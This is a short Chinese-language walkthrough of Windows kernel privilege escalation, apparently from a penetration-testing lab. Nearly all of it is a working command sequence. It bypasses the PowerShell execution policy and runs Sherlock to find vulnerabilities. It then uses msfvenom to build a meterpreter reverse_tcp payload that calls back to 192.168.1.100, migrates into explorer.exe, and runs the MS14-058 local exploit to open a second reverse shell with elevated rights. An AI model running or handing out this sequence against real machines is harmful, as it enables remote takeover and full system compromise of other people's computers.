windows内核提权

参考资料:

【windows】

1
2
3
powershell -nop -ep bypass
Import-Module C:\Users\whale\Desktop\Tools\Sherlock\Sherlock.ps1
Find-AllVulns

【kali】

1
2
3
4
msfconsole
handler -H 192.168.1.100 -P 4444 -p windows/x64/meterpreter/reverse_tcp

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe

【windows】 拷贝payload.exe并运行

【kali】

1
2
3
4
5
6
7
8
9
10
11
12
13
14
sessions -i 1
run migrate -n explorer.exe
getuid  【win-u8oiu3qm15c\whale】
background
use exploit/windows/local/ms14_058_track_popup_menu
show options
set session 1
show target
set target 1
set payload generic/shell_reverse_tcp
set lhost 192.168.1.100
set lport 4455
run
whoami

在b站上传了演示视频